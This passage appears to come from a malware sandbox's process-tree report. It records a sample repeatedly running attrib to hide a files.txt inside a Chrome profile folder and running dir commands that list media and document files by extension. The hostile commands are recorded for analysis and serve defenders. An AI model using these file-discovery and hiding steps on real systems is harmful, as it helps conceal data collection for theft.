PID:2308

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4316

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.mp3
4⤵
PID:4884

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4600

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:740

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:5968

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.mp4
4⤵
PID:1928

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5964

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.gif
4⤵
PID:4228

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3760

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2808

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5996

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2028

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3924

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.txt
4⤵
PID:3832

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3652

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5336

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5304

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5732

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5600

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5324

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:4520

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5676

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5032

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2308

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1652

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4976

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5220

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1688

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3392

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3660

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2060

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1928

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1684

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4828

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6084

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5392

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6052

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3656

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:1444

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4376

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2960

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1980

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5336

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3288

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5288

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5324

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1484

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:4524

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3812

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4868

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3664

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2496

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4740

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:740

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5968

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3916

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6104

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4828

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3760

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3584

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5996

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5576

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5692

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6040

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:952

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3508

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5304

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3180

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4252

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5000

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5324

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1484

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4580

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1168

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4316

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4976

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.png
4⤵
PID:5220

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5712

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5456

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3660

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2060

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1928

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3268

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5476

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:628

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2808

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4552

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5576

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1676

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3832

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4376

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6084

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6096

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5304

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3180

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4252

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5288

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4520

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3688

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3888

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4440

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5856

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4612

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3996

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2020

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5712

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5968

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1448

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1912

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2028

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4828

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:116

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3584

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5392

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4884

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:5568

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1444

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4256

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4956

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5248

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6136

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:5828

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5228

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3116

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4580

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4868

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4316

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4612

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6040

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5220

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6052

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5580

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5968

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6104

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1912

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5836

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4228

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1892

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3164

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:740

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5704

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4884

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3924

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:952

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5596

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:6084

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6096

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5304

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3288

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4100

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:6140

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1484

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4580

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2308

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5856

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1652

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3652

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5368

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4964

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5712

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3660

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3412

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2492

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2028

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4828

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:628

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2808

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2448

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5392

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5020

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3656

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3832

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4376

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5672

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5248

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5828

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3064

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4252

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3688

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3812

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3888

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4868

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4316

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:4612

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:3996

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
- Views/modifies file attributes
PID:6040

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:2660

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.pptx
4⤵
PID:4964

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:5712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c dir /b /s *.doc
4⤵
PID:2060

C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network/files.txt"
4⤵
PID:1448

C:\Windows\system32\attrib.exe
